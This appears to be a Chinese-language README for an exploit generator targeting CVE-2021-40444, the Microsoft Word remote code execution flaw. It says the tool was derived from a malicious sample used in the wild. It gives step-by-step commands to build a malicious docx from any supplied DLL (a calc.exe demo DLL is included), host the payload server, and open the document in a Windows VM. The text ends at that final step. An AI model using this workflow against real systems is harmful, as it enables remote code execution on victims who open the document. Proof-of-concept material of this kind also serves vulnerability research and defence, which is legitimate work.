利用 CVE-2021-40444(Microsoft Office Word 远程代码执行)的恶意 docx 生成器
此脚本的创建基于对在野使用样本的部分逆向工程:938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52(docx 文件)
首先需要安装 lcab(sudo apt-get install lcab)
查看 REPRODUCE.md 获取手动复现步骤
如果生成的 cab 无法工作,请尝试将 exploit.html URL 指向 calc.cab
首先根据给定的 DLL 生成恶意 docx 文档,可以使用 test/calc.dll 中的那个,它通过调用 system() 弹出 calc.exe
python3 exploit.py generate test/calc.dll http://<SRV IP>

生成恶意 docx(将在 out/ 目录下)后,即可设置服务器:
sudo python3 exploit.py host 80

最后在 Windows 虚拟机中尝试该 docx:
